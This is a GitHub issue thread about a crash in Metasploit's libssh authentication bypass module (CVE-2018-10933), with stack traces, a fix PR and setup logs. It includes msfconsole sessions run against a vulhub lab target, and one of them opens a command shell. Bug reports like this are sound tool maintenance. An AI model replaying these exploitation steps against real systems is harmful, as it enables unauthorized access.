Closed bmilliron67 closed 1 year ago
I was able to reproduce this error on an Ubuntu system running Ruby 2.7.0; however, when I use Ruby 3.0.5 the error does not occur and the module works fine.
Thanks for the additional details :+1: It looks like the user was running with Ruby 3.x as well:
```
Framework: 6.3.24-dev-
Ruby: ruby 3.0.2p107 (2021-07-07 revision 0db68f0233) [x86_64-linux]
```
Is your target vulnerable to the exploit?
I also encountered the same problem. Vulnerable target env from vulhub master:
```yaml
version: '2'
services:
  sshd:
    image: vulhub/libssh:0.8.1
    ports:
      - "2222:22"
      - "9876:9876"
```
Built a Docker image from tag 6.3.13, then entered msfconsole:
```
msf6 > search CVE-2018-10933
Matching Modules
================
# Name Disclosure Date Rank Check Description
- ---- --------------- ---- ----- -----------
0 auxiliary/scanner/ssh/libssh_auth_bypass 2018-10-16 normal No libssh Authentication Bypass Scanner
Interact with a module by name or index. For example info 0, use 0 or use auxiliary/scanner/ssh/libssh_auth_bypass
msf6 > use 0
msf6 auxiliary(scanner/ssh/libssh_auth_bypass) > use 0
msf6 auxiliary(scanner/ssh/libssh_auth_bypass) > set rhosts 10.65.106.29
rhosts => 10.65.106.29
msf6 auxiliary(scanner/ssh/libssh_auth_bypass) > set port 2222
[error] Unknown datastore option: port. Did you mean RPORT?
msf6 auxiliary(scanner/ssh/libssh_auth_bypass) > set rport 2222
rport => 2222
msf6 auxiliary(scanner/ssh/libssh_auth_bypass) > run
[info] 10.65.106.29:2222 - Attempting authentication bypass
[error] Auxiliary failed: ArgumentError wrong number of arguments (given 3, expected 1..2)
[error] Call stack:
[error] /usr/src/metasploit-framework/lib/net/ssh/command_stream.rb:43:in `initialize'
[error] /usr/src/metasploit-framework/modules/auxiliary/scanner/ssh/libssh_auth_bypass.rb:121:in `new'
[error] /usr/src/metasploit-framework/modules/auxiliary/scanner/ssh/libssh_auth_bypass.rb:121:in `run_host'
[error] /usr/src/metasploit-framework/lib/msf/core/auxiliary/scanner.rb:124:in `block (2 levels) in run'
[error] /usr/src/metasploit-framework/lib/msf/core/thread_manager.rb:105:in `block in spawn'
[info] Auxiliary module execution completed
msf6 auxiliary(scanner/ssh/libssh_auth_bypass) > version
Framework: 6.3.13-dev
Console : 6.3.13-dev
msf6 auxiliary(scanner/ssh/libssh_auth_bypass) >
```
But the old version, 6.1.5-dev, worked well.
```
msf6 > search CVE-2018-10933
Matching Modules
================
# Name Disclosure Date Rank Check Description
- ---- --------------- ---- ----- -----------
0 auxiliary/scanner/ssh/libssh_auth_bypass 2018-10-16 normal No libssh Authentication Bypass Scanner
Interact with a module by name or index. For example info 0, use 0 or use auxiliary/scanner/ssh/libssh_auth_bypass
msf6 > use 0
msf6 auxiliary(scanner/ssh/libssh_auth_bypass) > set rhosts 10.65.106.29
rhosts => 10.65.106.29
msf6 auxiliary(scanner/ssh/libssh_auth_bypass) > set rport 2222
rport => 2222
msf6 auxiliary(scanner/ssh/libssh_auth_bypass) > run
[*] 10.65.106.29:2222 - Attempting authentication bypass
[*] Command shell session 1 opened (10.65.106.29:40503 -> 10.65.106.29:2222) at 2022-10-12 15:28:42 +0800
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
msf6 auxiliary(scanner/ssh/libssh_auth_bypass) > sessions
Active sessions
===============
Id Name Type Information Connection
-- ---- ---- ----------- ----------
1 shell libssh Authentication Bypass 10.65.106.29:40503 -> 10.65.1
Scanner (SSH-2.0-libssh_0.8 06.29:2222 (10.65.106.29)
.1)
msf6 auxiliary(scanner/ssh/libssh_auth_bypass) > version
Framework: 6.1.5-dev
Console : 6.1.5-dev
msf6 auxiliary(scanner/ssh/libssh_auth_bypass) >
```
This error also occurred on source tag 6.3.25-dev with ruby 3.x.
```
bash-5.1# ./msfconsole
msf6 > search libssh_auth
Matching Modules
================
# Name Disclosure Date Rank Check Description
- ---- --------------- ---- ----- -----------
0 auxiliary/scanner/ssh/libssh_auth_bypass 2018-10-16 normal No libssh Authentication Bypass Scanner
Interact with a module by name or index. For example info 0, use 0 or use auxiliary/scanner/ssh/libssh_auth_bypass
msf6 > use 0
msf6 auxiliary(scanner/ssh/libssh_auth_bypass) > use 0
msf6 auxiliary(scanner/ssh/libssh_auth_bypass) > set rport 2022
rport => 2022
msf6 auxiliary(scanner/ssh/libssh_auth_bypass) > set rhosts 10.7.181.156
rhosts => 10.7.181.156
msf6 auxiliary(scanner/ssh/libssh_auth_bypass) > run
[info] 10.7.181.156:2022 - Attempting authentication bypass
[error] Auxiliary failed: ArgumentError wrong number of arguments (given 3, expected 1..2)
[error] Call stack:
[error] /usr/src/metasploit-framework/lib/net/ssh/command_stream.rb:43:in `initialize'
[error] /usr/src/metasploit-framework/modules/auxiliary/scanner/ssh/libssh_auth_bypass.rb:121:in `new'
[error] /usr/src/metasploit-framework/modules/auxiliary/scanner/ssh/libssh_auth_bypass.rb:121:in `run_host'
[error] /usr/src/metasploit-framework/lib/msf/core/auxiliary/scanner.rb:124:in `block (2 levels) in run'
[error] /usr/src/metasploit-framework/lib/msf/core/thread_manager.rb:105:in `block in spawn'
[info] Auxiliary module execution completed
msf6 auxiliary(scanner/ssh/libssh_auth_bypass) > ruby --version
[info] exec: ruby --version
ruby 3.0.5p211 (2022-11-24 revision ba5cf0f7c5) [x86_64-linux-musl]
msf6 auxiliary(scanner/ssh/libssh_auth_bypass) > version
Framework: 6.3.25-dev
Console : 6.3.25-dev
msf6 auxiliary(scanner/ssh/libssh_auth_bypass) >
```
@zhanglinqiang Thanks for the steps for reproducing the error :+1:
I've put up a pull request for this here: https://github.com/rapid7/metasploit-framework/pull/18203
I can verify the `Execute` action works as expected now, and there's no longer an error - but on my environment the `Shell` action isn't stable. Let me know if that's also true for your setup and we can dig deeper if so.
Thanks for your reply. With your PR, getting a shell failed on my env. As I mentioned before, 6.1.5-dev worked, so the vulnerable env is right.
```
msf6 auxiliary(scanner/ssh/libssh_auth_bypass) > run
[*] 10.65.106.29:2222 - Attempting authentication bypass
[-] Command shell session 8 is not valid and will be closed
[*] 10.65.106.29 - Command shell session 8 closed.
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
msf6 auxiliary(scanner/ssh/libssh_auth_bypass) >
```
framework log:
```
leen@leenPC:~/.msf4/logs$ tail -f framework.log
[07/21/2023 12:05:34] [w(0)] core: Warning: trying to report a session_event for a session with no db_record (8)
[07/21/2023 12:05:39] [d(0)] core: Session 8 failed to respond to an echo command
```
I've updated the module to no longer crash; the action should be set depending on the target's vulnerability, i.e. setting the action to `Execute` vs `Shell`.
Steps to reproduce
How'd you do it?
Expected behavior
shell or at least not crash
Current behavior
stacktrace
Metasploit version
```
Framework: 6.3.24-dev-
Console : 6.3.24-dev-
```
Additional Information
Module/Datastore
The following global/module datastore, and database setup was configured before the issue occurred:
```
[framework/database]

[framework/database/local-https-data-service]
url=[Filtered]
cert=[Filtered]
skip_verify=[Filtered]
api_token=[Filtered]

[framework/ui/console]
ActiveModule=auxiliary/scanner/ssh/libssh_auth_bypass

[scanner/ssh/libssh_auth_bypass]
RHOSTS=x.x.x.x
CHECK_BANNER=false
VERBOSE=true
loglevel=3
WORKSPACE=
RPORT=22
SSH_IDENT=SSH-2.0-OpenSSH_7.6p1 Ubuntu-4ubuntu0.3
SSH_TIMEOUT=10
SSH_DEBUG=false
THREADS=1
ShowProgress=true
ShowProgressPercent=10
CreateSession=true
InitialAutoRunScript=
AutoRunScript=
CommandShellCleanupCommand=
AutoVerifySession=true
CMD=
SPAWN_PTY=false
```
Database Configuration
The database contains the following information:
```
Session Type: Connected to msf. Connection type: postgresql.
```

| ID | Hosts | Vulnerabilities | Notes | Services |
|-:|-:|-:|-:|-:|
| 1 **(Current)** | 2 | 2 | 0 | 1 |
| **Total (1)** | **2** | **2** | **0** | **1** |

History
The following commands were ran during the session and before this issue occurred:
```
35 use 0
36 search libssh
37 use auxiliary/scanner/ssh/libssh_auth_bypass
38 set rhosts x.x.x.x
39 set check_banner false
40 set verbose true
41 show options
42 run
43 version
44 set loglevel 3
45 run
46 debug
```
Framework Errors
The following framework errors occurred before the issue occurred:
```
[07/05/2023 22:14:22] [e(0)] core: Thread Exception: ScannerHost(scanner/ssh/libssh_auth_bypass)-x.x.x.x critical=false source:
/opt/metasploit-framework/embedded/framework/lib/msf/core/auxiliary/scanner.rb:118:in `block in run'
/opt/metasploit-framework/embedded/framework/lib/msf/core/auxiliary/scanner.rb:101:in `loop'
/opt/metasploit-framework/embedded/framework/lib/msf/core/auxiliary/scanner.rb:101:in `run'
/opt/metasploit-framework/embedded/framework/lib/msf/base/simple/auxiliary.rb:178:in `job_run_proc'
/opt/metasploit-framework/embedded/framework/lib/msf/base/simple/auxiliary.rb:85:in `run_simple'
/opt/metasploit-framework/embedded/framework/lib/msf/base/simple/auxiliary.rb:96:in `run_simple'
/opt/metasploit-framework/embedded/framework/lib/msf/ui/console/command_dispatcher/auxiliary.rb:69:in `cmd_run'
/opt/metasploit-framework/embedded/framework/lib/rex/ui/text/dispatcher_shell.rb:581:in `run_command'
/opt/metasploit-framework/embedded/framework/lib/rex/ui/text/dispatcher_shell.rb:530:in `block in run_single'
/opt/metasploit-framework/embedded/framework/lib/rex/ui/text/dispatcher_shell.rb:524:in `each'
/opt/metasploit-framework/embedded/framework/lib/rex/ui/text/dispatcher_shell.rb:524:in `run_single'
/opt/metasploit-framework/embedded/framework/lib/rex/ui/text/shell.rb:168:in `run'
/opt/metasploit-framework/embedded/framework/lib/metasploit/framework/command/console.rb:48:in `start'
/opt/metasploit-framework/embedded/framework/lib/metasploit/framework/command/base.rb:82:in `start'
/opt/metasploit-framework/bin/../embedded/framework/msfconsole:23:in `
```
Web Service Errors
The following web service errors occurred before the issue occurred:
```
No matching patterns were found in msf-ws.log.
```
Framework Logs
The following framework logs were recorded before the issue occurred:
```
/opt/metasploit-framework/embedded/framework/lib/rex/ui/text/dispatcher_shell.rb:581:in `run_command'
/opt/metasploit-framework/embedded/framework/lib/rex/ui/text/dispatcher_shell.rb:530:in `block in run_single'
/opt/metasploit-framework/embedded/framework/lib/rex/ui/text/dispatcher_shell.rb:524:in `each'
/opt/metasploit-framework/embedded/framework/lib/rex/ui/text/dispatcher_shell.rb:524:in `run_single'
/opt/metasploit-framework/embedded/framework/lib/rex/ui/text/shell.rb:168:in `run'
/opt/metasploit-framework/embedded/framework/lib/metasploit/framework/command/console.rb:48:in `start'
/opt/metasploit-framework/embedded/framework/lib/metasploit/framework/command/base.rb:82:in `start'
/opt/metasploit-framework/bin/../embedded/framework/msfconsole:23:in `
```
Web Service Logs
The following web service logs were recorded before the issue occurred:
```
2022-08-08 20:52:01 +0000 Writing PID to /home/foresitelabs/.msf4/msf-ws.pid
2022-08-08 20:52:06 +0000 Thin web server (v1.8.1 codename Infinite Smoothie)
2022-08-08 20:52:06 +0000 Maximum connections set to 1024
2022-08-08 20:52:06 +0000 Listening on localhost:5443, CTRL+C to stop
2023-03-09 16:42:46 +0000 Restarting ...
2023-03-09 16:42:47 +0000 Writing PID to /home/foresitelabs/.msf4/msf-ws.pid
2023-03-09 16:42:59 +0000 Thin web server (v1.8.1 codename Infinite Smoothie)
2023-03-09 16:42:59 +0000 Maximum connections set to 1024
2023-03-09 16:42:59 +0000 Listening on localhost:5443, CTRL+C to stop
```
Version/Install
The versions and install method of your Metasploit setup:
```
Framework: 6.3.24-dev-
Ruby: ruby 3.0.2p107 (2021-07-07 revision 0db68f0233) [x86_64-linux]
OpenSSL: OpenSSL 1.1.1m 14 Dec 2021
Install Root: /opt/metasploit-framework/embedded/framework
Session Type: Connected to msf. Connection type: postgresql.
Install Method: Omnibus Installer
```